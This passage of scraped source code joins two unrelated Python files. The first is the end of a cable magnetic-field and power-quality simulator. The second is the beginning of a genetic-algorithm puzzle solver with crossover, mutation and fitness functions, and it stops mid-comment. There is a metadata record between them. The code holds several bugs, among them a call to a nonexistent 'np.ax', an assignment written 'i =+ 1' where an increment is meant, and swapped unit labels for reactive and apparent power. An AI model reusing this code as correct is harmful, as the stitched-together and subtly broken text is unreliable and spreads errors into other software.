\"\"\"\n User function to add PE (earth) to the simulation\n\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :param diam: Diameter of the conductor / wire\n :return:\n \"\"\"\n self.__add_conductor('PE', pos_x, pos_y, diam)\n\n def add_sensor(self, name, pos_x, pos_y):\n \"\"\"\n User function to add one sensor to the simulation\n\n :param name: Unique name\n :param pos_x: Position on the x-axis\n :param pos_y: Position on the y-axis\n :return:\n \"\"\"\n self.sensors[name] = self.Sensor(name, pos_x, pos_y)\n\n def add_sensors(self, n, r=None, phi0=0):\n \"\"\"\n User function to add multiple sensors to the simulation.\n The sensors will be distributed equal around the conductor\n at a distance of r and an initial offset angle of phi0\n referenced to the positive x-axis\n\n :param n: Number of sensors to place\n :param r: Optional. Distance (in m) from the center at which the sensors will be placed.\n If not provided, sensors will be placed with an offset of 1mm on the cable\n :param phi0: Optional. Initial angle-offset in degrees. Defaults to 0°\n :return:\n \"\"\"\n self.sensors = {}\n # assert n > 1, 'Error: number of sensors must be greater than 1'\n\n if r is None:\n r = self.d/2 + 1e-3\n else:\n assert r > self.x_max, \"Error, sensor outside the simulation space\"\n\n angles = np.arange(0, 2 * np.pi, 2 * np.pi / n)\n angles = angles + np.deg2rad(phi0)\n for i, phi in enumerate(angles):\n z = (r) * np.exp(1j * (phi))\n self.add_sensor('m' + str(i + 1), np.real(z), np.imag(z))\n\n def set_L1_I(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the current in L1\n\n :param A1: RMS-Amplitude (in A) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in A) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in A) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in A) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_current('L1', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L2_I(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the current in L2\n\n :param A1: RMS-Amplitude (in A) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in A) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in A) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in A) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_current('L2', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L3_I(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the current in L3\n\n :param A1: RMS-Amplitude (in A) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in A) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in A) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in A) of the seventh 
harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_current('L3', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L1_V(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the voltage in L1\n\n :param A1: RMS-Amplitude (in V) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in V) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in V) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in V) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_voltage('L1', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L2_V(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the voltage in L2\n\n :param A1: RMS-Amplitude (in V) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in V) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in V) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in V) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_voltage('L2', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def set_L3_V(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n User function to set parameters of the voltage in L3\n\n :param A1: RMS-Amplitude (in V) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in V) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in V) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in V) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n self._set_voltage('L3', A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift)\n\n def _set_current(self, name, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n Function to set the current of an existing conductor\n\n :param name: Unique name of an existing conductor\n :param A1: RMS-Amplitude (in A) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in A) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in A) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in A) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n 
:param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n if name in self.conductors.keys():\n sig = self.Signal(A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift, self.fs, self.f0, self.w0, self.t)\n self.conductors[name].set_current_sig(sig)\n else:\n raise ValueError('No conductor with this name!')\n\n def _set_voltage(self, name, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift):\n \"\"\"\n Function to set the voltage of an existing conductor (referenced to N)\n\n :param name: Uniqua name of an existing conductor\n :param A1: RMS-Amplitude (in V) of the base frequency (50Hz)\n :param A3: RMS-Amplitude (in V) of the third harmonic (150Hz)\n :param A5: RMS-Amplitude (in V) of the fifth harmonic (250Hz)\n :param A7: RMS-Amplitude (in V) of the seventh harmonic (350Hz)\n :param Phi1: Phase-Shift (in deg) of the base frequency (50Hz)\n :param Phi3: Phase-Shift (in deg) of the third harmonic (150Hz)\n :param Phi5: Phase-Shift (in deg) of the fifth harmonic (250Hz)\n :param Phi7: Phase-Shift (in deg) of the seventh harmonic (350Hz)\n :param Shift: Global-Shift (in deg) of all frequency components\n :return:\n \"\"\"\n if name in self.conductors.keys():\n sig = self.Signal(A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift, self.fs, self.f0, self.w0, self.t)\n self.conductors[name].set_voltage_sig(sig)\n else:\n raise ValueError('No conductor with this name!')\n\n def plot_Waveforms(self):\n \"\"\"\n Function provides a plot of currents and voltages of the available conductors\n\n :return:\n \"\"\"\n self.__calc_N()\n fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12, 6))\n\n for name, con in self.conductors.items():\n if not (con.V is None):\n ax[0].plot(self.t, con.V, label=name)\n ax[0].set_title('Line Voltages')\n ax[0].set_xlabel('Time [s]')\n ax[0].set_ylabel('Voltage [V]')\n\n for name, con in self.conductors.items():\n if not (con.I is None):\n ax[1].plot(self.t, con.I, label=name)\n ax[1].set_title('Line Currents')\n ax[1].set_xlabel('Time [s]')\n ax[1].set_ylabel('Current [A]')\n for axes in ax:\n axes.legend()\n axes.grid()\n fig.tight_layout()\n\n def __calc_N(self):\n \"\"\"\n Function to calculate the resulting neutral current from available conductors except PE\n\n :return:\n \"\"\"\n signals = []\n if 'N' in self.conductors.keys():\n # check if any other conductor is defined and has a signal\n for name, con in self.conductors.items():\n if (name == 'N') or (name == 'PE'):\n continue\n signals.append(con.I)\n if len(signals) > 0:\n self.conductors['N'].I = -np.sum(signals, axis=0)\n else:\n raise Warning('Neutral is not defined!')\n\n def plot_Layout(self):\n \"\"\"\n Function to plot the layout of the simulation including conductor position and diameter and optionally placed\n sensors\n\n :return:\n \"\"\"\n fig, ax = plt.subplots(figsize=(7, 5))\n ax.set_xlim([self.x_min, self.x_max])\n ax.set_ylim([self.y_min, self.y_max])\n ax.set_xlabel('X-Axis [m]')\n ax.set_ylabel('Y-Axis [m]')\n ax.add_artist(plt.Circle((0, 0), (self.d / 2), color='k', fill=False))\n if len(self.conductors) > 0:\n for name, con in self.conductors.items():\n ax.add_artist(plt.Circle((con.x, con.y), con.d / 2, color='k', fill=False))\n ax.text(con.x + 1e-3, con.y, con.name, fontsize=10)\n\n if len(self.sensors) > 0:\n for sensor in self.sensors.values():\n p_x = sensor.x\n p_y = sensor.y\n tmp_circle = plt.Circle((p_x, p_y), 0.2e-3, color='r', fill=True)\n ax.add_artist(tmp_circle)\n ax.text(p_x, p_y, sensor.name, 
fontsize=12)\n ax.set_aspect('equal')\n ax.grid(True)\n\n return fig, ax\n\n def plot_Fields(self, idx, scale='global'):\n \"\"\"\n Function to plot individual magnetic field maps\n\n :param idx: Time-Index for which the corresponding magnetic field map should be plotted\n :param scale: Applied scaling factor of the meshgrid. \"global\" fixes the scale to the global maximum and minimum\n of the entire time series. \"local\" scales each plot individually. Default: 'global'\n :return:\n \"\"\"\n fig, ax = self.plot_Layout()\n\n if len(self.B_meshgrids) > 0:\n mesh = self.B_meshgrids[idx]\n if scale == 'global':\n vmin = np.min(self.B_meshgrids)\n vmax = np.max(self.B_meshgrids)\n if scale == 'local':\n vmin = np.min(mesh)\n vmax = np.ax(mesh)\n im = ax.imshow(mesh,\n aspect='equal',\n cmap='jet',\n norm=matplotlib.colors.LogNorm(),\n origin='lower',\n extent=(self.x_min, self.x_max, self.y_min, self.y_max),\n vmin=vmin,\n vmax=vmax)\n cb = plt.colorbar(im)\n cb.set_label('Magnetic Flux Density [uT]')\n\n # for sensor in self.sensors.values():\n # p_x = sensor.x\n # p_y = sensor.y\n # tmp_circle = plt.Circle((p_x, p_y), 0.5e-3, color='r', fill=True)\n # ax.add_artist(tmp_circle)\n # ax.text(p_x, p_y, sensor.name, fontsize=12)\n # ax.grid(True)\n # ax.set_aspect('equal')\n\n def get_Meshgrids(self):\n \"\"\"\n Returns an array of all calculated meshgrids\n\n :return: Array of size N\n \"\"\"\n return self.B_meshgrids\n\n def get_Measurements(self):\n \"\"\"\n Returns a pandas DataFrame of the measured magnetic flux density measured for each sensor.\n Columns represent sensors, rows individual samples.\n\n :return: pandas DataFrame\n \"\"\"\n tmp = {}\n for name, sensor in self.sensors.items():\n tmp[name] = sensor.B_fields\n\n return pd.DataFrame(tmp)\n \n def get_Measurements_Exact(self):\n \n B = {}\n sens = []\n for key in self.sensors.keys():\n B[key] = []\n sens.append(self.sensors[key].x)\n sens.append(self.sensors[key].y)\n sens = np.array(sens).reshape(-1, 2)\n\n for idx in range(len(self.t)):\n x = []\n for key in self.conductors.keys():\n if key == 'PE':\n continue\n x.append([self.conductors[key].x, self.conductors[key].y, self.conductors[key].I[idx]])\n x = np.array(x).reshape(len(self.conductors)-1, -1)\n\n tmp = self._get_B_exact(x, sens)\n for i, key, in enumerate(self.sensors.keys()):\n B[key].append(tmp[i])\n\n return pd.DataFrame(B)\n\n\n \n\n \n\n def get_Waveforms(self):\n \"\"\"\n Returns a pandas DataFrame of all currents and voltages\n\n :return: pandas DataFrame\n \"\"\"\n self.__calc_N()\n tmp = {}\n tmp['Time'] = self.t\n\n for name, con in self.conductors.items():\n if not (con.V is None):\n tmp[name + 'V'] = con.V\n\n for name, con in self.conductors.items():\n if not (con.I is None):\n tmp[name + 'I'] = con.I\n\n return pd.DataFrame(tmp)\n\n def get_Features(self):\n \"\"\"\n Returns a dictionary consisting of all relevant features of the IEEE1459 standard for each current carrying\n conductor\n :return: dict with conductor names as key and features as values\n \"\"\"\n self.__calc_N()\n features = {}\n for name, con in self.conductors.items():\n if (name == 'N') or (name == 'PE'):\n continue\n features[name] = con.get_Power()\n return features\n\n def _get_B_exact(self, x, sens):\n \"\"\"\n param x: location and current of conductors, [[x1, y1, I1], [x2, y2, I2], ...]\n param sens: location of sensors [[x1, y1], [x2, y2]]\n \"\"\"\n Theta = 0\n u0 = 4 * np.pi * 1e-7\n N = sens.shape[0]\n M = x.shape[0]\n # result = np.ones((M, N))*np.nan\n result = []\n\n for n in 
range(N): # n=sensor number\n for m in range(M): # m = conductor number\n den = 2 * np.pi * np.sqrt((sens[n, 0]) ** 2 + (sens[n, 1]) ** 2) * (\n (sens[n, 0] - x[m, 0]) ** 2 + (sens[n, 1] - x[m, 1]) ** 2)\n nom = u0 * x[m, 2] * (\n ((sens[n, 0] * np.cos(Theta) - sens[n, 1] * np.sin(Theta)) * (sens[n, 0] - x[m, 0])) + \\\n +((sens[n, 1] * np.cos(Theta) + sens[n, 0] * np.sin(Theta)) * (sens[n, 1] - x[m, 1])))\n # result[m,n] = nom/den\n result.append(nom / den)\n result = np.array(result).reshape(N, M)\n result = np.array(result).sum(axis=1) * 1e6\n return result\n\n def _get_B(self, x, y, xi, yi, d, i):\n \"\"\"\n Calculates the magnetic field strength at a certain location (x-, y-coordiantes)\n\n Parameters:\n x, y: meshgrid [Meter]\n xi, yi: location of the conductor [Meter]\n d: dimension of conductor in [Meter]\n i: current through the conductor [Ampere]\n\n return:\n bx, by: meshgrid\n \"\"\"\n\n mu = 4*np.pi*1e-7 # magnetic constant\n r = np.sqrt((x - xi) ** 2 + (y - yi) ** 2) # distance to conductor\n # r = r + 1e-4\n mask = (r) < d / 2 # use only coordinates outside of conductor\n r[mask] = d / 2 # set distance inside conductor to big values\n mag = (mu / (2 * np.pi)) * (abs(i) / r) # Magnitude of the vector B\n\n # calculate x- and y-component of magnitude\n r = np.sqrt((x - xi) ** 2 + (y - yi) ** 2) # distance to conductor\n x = (x - xi) / r\n y = (y - yi) / r\n if (i > 0):\n by = mag * x # By\n bx = mag * -y # Bx\n else:\n by = mag * -x # By\n bx = mag * y # Bx\n\n return bx, by, mag\n\n def run(self):\n \"\"\"\n Start the simulation and calculate currents and magnetic fields\n :return:\n \"\"\"\n self.StartTime = datetime.datetime.now().isoformat()\n self.__calc_N()\n # reset calculated meshgrids\n self.B_meshgrids = []\n # reset sensors\n for sensor in self.sensors.values():\n sensor.B_fields = []\n\n for idx in range(len(self.t)):\n bx = []\n by = []\n for name, con in self.conductors.items():\n if name == 'PE':\n continue\n _bx, _by, _mag = self._get_B(self.mesh_x,\n self.mesh_y,\n con.x,\n con.y,\n con.d,\n con.I[idx])\n bx.append(_bx)\n by.append(_by)\n\n # calculate superposition of all magnetic field vectors\n bx = np.sum(bx, axis=0)\n by = np.sum(by, axis=0)\n\n # calculate magnitude and convert into uT\n mag = np.sqrt(bx ** 2 + by ** 2) * 1e6\n self.B_meshgrids.append(mag)\n zero = len(mag) / 2\n\n for sensor in self.sensors.values():\n # get sensor coordinates\n x_s = sensor.x\n y_s = sensor.y\n\n # get index relative to meshgrid\n x_s_idx = int(zero + x_s / self.res)\n y_s_idx = int(zero + y_s / self.res)\n\n # get B-Vector in coresponding direction\n x_B = bx[y_s_idx, x_s_idx]\n y_B = by[y_s_idx, x_s_idx]\n\n # calculate magnitude according to sensors angle in uT\n B_hat = ((-y_s * x_B + x_s * y_B) / (np.sqrt(x_s ** 2 + y_s ** 2)) * 1e6)\n\n sensor.B_fields.append(B_hat)\n self.EndTime = datetime.datetime.now().isoformat()\n\n class Conductor(object):\n\n def __init__(self, name, pos_x, pos_y, diam):\n\n self.name = name\n self.x = pos_x\n self.y = pos_y\n self.d = diam\n self.sig_I = None\n self.sig_V = None\n self._I = None\n\n def set_current_sig(self, sig):\n \"\"\"\n Sets the current of this conductor\n :param sig: Signal object\n :return:\n \"\"\"\n self.sig_I = sig\n\n def get_current_sig(self):\n \"\"\"\n Returns current of this conductor\n :return: Signal object\n \"\"\"\n return self.sig_I\n\n def set_voltage_sig(self, sig):\n \"\"\"\n Sets the voltage of this conductor (referenced to N)\n\n :param sig: Signal object\n :return:\n \"\"\"\n self.sig_V = 
sig\n\n def get_voltage_sig(self):\n \"\"\"\n Gets the voltage of this conductor\n :return: Signal object\n \"\"\"\n return self.sig_V\n\n def update(self, w0, t):\n \"\"\"\n Function to update important simulation parameters\n\n :param w0: Angular frequency [rad/s]\n :param t: time vector [s]\n :return:\n \"\"\"\n if not (self.sig_I is None) and (self.sig_V is None):\n self.sig_I.update(w0, t)\n self.sig_V.update(w0, t)\n\n def get_Power(self, verbose=False):\n \"\"\"\n Returns a dict of relevant IEEE1459 features\n :param verbose: True to plot calculated features.\n :return: dict with feature names as keys and features as values\n \"\"\"\n i = self.I\n v = self.V\n fs = self.sig_I.fs\n f0 = self.sig_I.f0\n N = len(i)\n Shift_90 = int((fs / f0) / 4)\n assert len(i) == len(v)\n # RMS von Strom und Spannung\n Irms = np.sqrt(np.mean(np.square(i[0:int(N / 2)])))\n\n Urms = np.sqrt(np.mean(np.square(v[0:int(N / 2)])))\n\n # Wirk- und Blindleistung\n P = np.dot(v[0:int(N / 2)], i[0:int(N / 2)]) / (N / 2)\n Q = np.dot(v[0:int(N / 2)], i[Shift_90:int(N / 2) + Shift_90]) / (N / 2)\n\n # Scheinleistung CAVEAT: Gilt nur wenn Strom und Spannung Sinusförmig sind!!\n S = Urms * Irms\n D = np.sqrt(S ** 2 - P ** 2 - Q ** 2)\n PF = P / S\n\n if verbose:\n print(\"Urms = %0.4f [V]\" % Urms)\n print(\"Irms = %0.4f [A]\" % Irms)\n print(\"P = %0.4f [W]\" % P)\n print(\"Q = %0.4f [VA]\" % Q)\n print(\"S = %0.4f [Var]\" % S)\n print(\"PF = %0.4f [-]\" % PF)\n print(\"D = %0.4f [-]\" % D)\n\n return {'Urms': Urms, 'Irms': Irms, 'P': P, 'Q': Q, 'S': S, 'PF': PF, 'D': D}\n\n @property\n def I(self):\n \"\"\"\n Returns the an array of generated current samples\n :return: array\n \"\"\"\n if not (self.sig_I is None):\n return self.sig_I.calc()\n else:\n return self._I\n\n @I.setter\n def I(self, I):\n \"\"\"\n Sets local current samples\n :param I:\n :return:\n \"\"\"\n self._I = I\n\n @property\n def V(self):\n \"\"\"\n Returns an array of voltage samples\n :return:\n \"\"\"\n if not (self.sig_V is None):\n return self.sig_V.calc()\n\n class Signal(object):\n\n def __init__(self, A1, A3, A5, A7, Phi1, Phi3, Phi5, Phi7, Shift, fs, f0, w0, t):\n self.A1 = A1\n self.A3 = A3\n self.A5 = A5\n self.A7 = A7\n self.Phi1 = Phi1\n self.Phi3 = Phi3\n self.Phi5 = Phi5\n self.Phi7 = Phi7\n self.Shift = Shift\n self.fs = fs\n self.f0 = f0\n self.w0 = w0\n self.t = t\n\n self.calc()\n\n def update(self, w0, t):\n \"\"\"\n Function to update important simulation parameters\n\n :param w0: Angular frequency [rad/s]\n :param t: time vector [s]\n :return:\n \"\"\"\n self.w0 = w0\n self.t = t\n self.calc()\n\n def calc(self):\n \"\"\"\n Calculates the signal time-series according to the provided parameters\n :return: numpy array\n \"\"\"\n # Angles of the fundamental component and harmonics\n phi1 = np.deg2rad(self.Phi1 + self.Shift)\n phi3 = np.deg2rad(self.Phi3 + self.Shift * 3)\n phi5 = np.deg2rad(self.Phi5 + self.Shift * 5)\n phi7 = np.deg2rad(self.Phi7 + self.Shift * 7)\n\n # instantaneous values\n H1 = np.sqrt(2) * self.A1 * np.sin(1 * self.w0 * self.t + phi1)\n H3 = np.sqrt(2) * self.A3 * np.sin(3 * self.w0 * self.t + phi3)\n H5 = np.sqrt(2) * self.A5 * np.sin(5 * self.w0 * self.t + phi5)\n H7 = np.sqrt(2) * self.A7 * np.sin(7 * self.w0 * self.t + phi7)\n\n return H1 + H3 + H5 + H7\n\n class Sensor(object):\n\n def __init__(self, name, pos_x, pos_y, angle=None):\n self.name = name\n self.x = pos_x\n self.y = pos_y\n self.angle = angle\n self.B_fields = 
[]","repo_name":"tecamenz/MCMFS","sub_path":"mcmfs/cable_simulation.py","file_name":"cable_simulation.py","file_ext":"py","file_size_in_byte":30482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37460090526","text":"import numpy as np\nimport random\nfrom itertools import permutations\nfrom collections import Counter\nimport matplotlib.pyplot as plt\nfrom tabulate import tabulate\n\n# ------ parameters --------------------------------------------------------------------------#\n# globals\nnumbers = None\nindex = 0\nN = None\ngiven_constraints = None\npopulation_size = 200\nold_population_percent = 0.3\nnew_population_percent = 0.4\nrandom_population_percent = 0.3\nconstraint_weight = 5\nmutation_percent = 0.2\nmaximum_generation = None\nblack_list = set()\nmax_score_list_reg, av_score_list_reg = [], []\nmax_score_list_darwin, av_score_list_darwin = [], []\nmax_score_list_lamark, av_score_list_lamark = [], []\naccuracy_reg, accuracy_darwin, accuracy_lamark = 0, 0, 0\n\n# dynamic parameters\nconfig_list, initial_matrix, greater_constraints, max_fitness = None, None, None, None\npopulation, fitness_scores, generation = None, None, None\n# ----------------------------------------------------------------------------------------------#\n\n# returns the next index - grows each time +1\ndef next_index():\n global index\n index += 1\n return index\n\n# returns a list of all configuration according to the config.txt file given\ndef read_config_list(filename):\n config = open(filename, \"r\")\n config_list = []\n for line in config:\n stripped_line = line.strip()\n item = stripped_line\n if ' ' in stripped_line:\n item = stripped_line.split(' ')\n config_list.append(item)\n config.close()\n return config_list\n\n# creates a matrix according to the list of configuration made by config.txt\ndef build_matrix(config_list):\n global N\n N = int(config_list[index])\n matrix = np.zeros((N, N)) # empty\n given_digits = int(config_list[next_index()])\n for i in range(given_digits):\n curr = next_index()\n x, y, digit = int(config_list[curr][0]) - 1, int(config_list[curr][1]) - 1, int(config_list[curr][2])\n matrix[x,y] = digit # filled\n black_list.add((x,y))\n return matrix\n\n# builds greater_constraints = a dict with all the constarins accccording to config_list\ndef build_greater_than_dict(config_list):\n global given_constraints\n given_constraints = int(config_list[next_index()])\n greater_constraints = {}\n for i in range(given_constraints): # go through constraints\n curr = next_index()\n x1, y1 = int(config_list[curr][0]) - 1, int(config_list[curr][1]) - 1\n x2, y2 = int(config_list[curr][2]) - 1, int(config_list[curr][3]) - 1\n if (x1, y1) not in greater_constraints.keys():\n greater_constraints[(x1, y1)] = [] # init key\n greater_constraints[(x1, y1)].append((x2, y2)) # add value\n return greater_constraints\n\n# builds population dict = from a matrix copy inserts randon population\n# generates a poulation into empty matrix cells and dict\ndef build_population(matrix):\n population = {}\n for index in range(population_size): #100\n matrix_copy = matrix.copy()\n for i in range(N):\n for j in range(N):\n if matrix_copy[i,j] == 0:\n matrix_copy[i,j] = numbers[random.randrange(0, len(numbers))] # insert to matrix\n population[index] = matrix_copy # add to dict\n return population\n\n# receives a matrix and fills row values as permutation and returns population dict\ndef build_population_rows(matrix):\n population = {}\n list_row = 
numbers.copy() # val not in constrains\n while len(population) < population_size: # make matrixs\n matrix_copy = matrix.copy()\n # go through each row\n for row in range(N):\n list_row = numbers.copy() # val not in constrains\n no_cons_list = [] # index of cells with NO sonstrains (need to fill)\n \n # go through each each cell in row\n for column in range(N):\n if matrix_copy[row,column] == 0: # empty no constrain\n no_cons_list.append(column)\n else: # not 0 has constarain - remove from list_row\n list_row.remove(matrix_copy[row,column]) \n # look at full row\n l = list(permutations(list_row)) # using only vaues that arent in constrains in current row\n chosen_row = random.choice(l) # get random perm\n # fill row with values that arent in constrains in indexes that arend in constarins\n i = 0\n for column in no_cons_list: # index\n matrix_copy[row,column] = chosen_row[i] # insert to matrix\n i =+ 1\n population[str(matrix_copy)] = matrix_copy # add to dict\n return population\n\n# ------- fitness functions ---------------------------------------------------------------------#\n# calc matrix fitness score according to num of errors in row and column \n# the higher the score the better\ndef fitness(matrix):\n numbers_set = set(numbers)\n errors = 0\n for i in range(N):\n errors += N - len(set(matrix[i])) # row\n errors += N - len(set(matrix[:,i])) # column \n for cell in greater_constraints.keys():\n for related in greater_constraints[cell]:\n if matrix[cell] <= matrix[related]:\n errors += constraint_weight \n return max_fitness - errors # scrore \n\n# receives population dict of all positions and calcalates corrent population's score\ndef build_fitness_scores(population):\n# ------------------------------------------------------------------------------------------------#\n fitness_scores = {}\n for key in population.keys():\n fitness_scores[key] = fitness(population[key])\n return fitness_scores\n\n# chooses best two population matrix with highest scores - matrix with higher scores will have more chance to be chosen\ndef choose_parents(population, fitness_scores):\n raffle_box = [] # list\n for index in population.keys():\n raffle_box.extend([index for i in range(fitness_scores[index])]) # matrix with higher scores will have more chance to be chosen\n index1, index2 = random.sample(raffle_box, 2) # choose 2\n return population[index1], population[index2]\n\n# ------- cross_over ----------------------------------------------------------------------------#\n# create new matrix according to 2 parent matrix\ndef cross_over(matrix1, matrix2):\n max_crossed = matrix1.copy()\n max_fit = fitness(max_crossed)\n # checks horizontal and vertical cross and according to highest fit chooses best crossover\n N_half = int(N/2)\n chosen = []\n for index in range(N):\n # 1) horizontal\n horizontal_cross = matrix1.copy()\n horizontal_cross[index:] = matrix2[index:] # row\n horizontal_fit = fitness(horizontal_cross)\n if horizontal_fit > max_fit:\n chosen = \"horizontal\"\n max_crossed = horizontal_cross\n max_fit = horizontal_fit\n \n # half left horizontal\n horizontal_half_left = matrix1.copy()\n horizontal_half_left[index:N_half] = matrix2[index:N_half] # left row\n horizontal_half_left_fit = fitness(horizontal_half_left)\n if horizontal_half_left_fit > max_fit:\n chosen = \"half left horizontal\"\n max_crossed = horizontal_half_left\n max_fit = horizontal_half_left_fit\n \n # half right horizontal\n horizontal_half_right = matrix1.copy()\n horizontal_half_right[N_half:index] = matrix2[N_half:index] # 
right row\n horizontal_half_right_fit = fitness(horizontal_half_right)\n if horizontal_half_right_fit > max_fit:\n chosen = \"half right horizontal\"\n max_crossed = horizontal_half_right\n max_fit = horizontal_half_right_fit\n \n # half vertical\n vertical_cross = matrix1.copy()\n vertical_cross[:, index:] = matrix2[:, index:] # column\n vertical_fit = fitness(vertical_cross)\n if vertical_fit > max_fit:\n chosen = \"half vertical\"\n max_crossed = vertical_cross\n max_fit = vertical_fit\n \n # half top vertical\n vertical_cross_top = matrix1.copy()\n vertical_cross_top[:, index:N_half] = matrix2[:, index:N_half] # top column\n vertical_top_fit = fitness(vertical_cross_top)\n if vertical_top_fit > max_fit:\n chosen = \"half top vertical\"\n max_crossed = vertical_cross_top\n max_fit = vertical_top_fit\n \n # half lower vertical\n vertical_cross_lower = matrix1.copy()\n vertical_cross_lower[:, N_half:index] = matrix2[:, N_half:index] # lower column\n vertical_lower_fit = fitness(vertical_cross_lower)\n if vertical_lower_fit > max_fit:\n chosen = \"half lower vertical\"\n max_crossed = vertical_cross_lower\n max_fit = vertical_lower_fit\n \n \n #print(\"chosen: \", chosen)\n return max_crossed # where the slices' union is the smallest\n\n# bool checks if random is smaller then the probability given - used in create_new_population()\ndef raffle(probability):\n return random.random() < probability\n\n# ------- mutation ------------------------------------------------------------------------------#\n# create mutation in one cell of the matrix given - inputs a random value\ndef mutation(matrix):\n success = False\n while not success:\n i = random.randrange(0, N)\n j = random.randrange(0, N)\n if (i,j) not in black_list:\n success = True\n new_number = random.choice(numbers)\n matrix[i,j] = new_number\n return matrix\n\n# creates generations that keep improving \ndef create_new_population(population, fitness_scores):\n # cross over\n matrix1, matrix2 = choose_parents(population, fitness_scores) # parents\n matrix = cross_over(matrix1, matrix2) # child\n \n # mutate\n if raffle(mutation_percent):\n matrix = mutation(matrix)\n return matrix\n\n# generates a new matrix randomly\ndef create_random_population():\n random_matrix = initial_matrix.copy()\n for i in range(N):\n for j in range(N):\n if random_matrix[i,j] == 0:\n random_matrix[i,j] = numbers[random.randrange(0, len(numbers))] # insert to matrix\n return random_matrix\n\n# returns a list chosen_population that hold 200*0.3 best scored matrixs\ndef choose_best(population, fitness_scores):\n # sort fitness_scores\n sorted_fitness_scores_values = sorted(fitness_scores.items(), key=lambda x: x[1], reverse=True)\n # cut 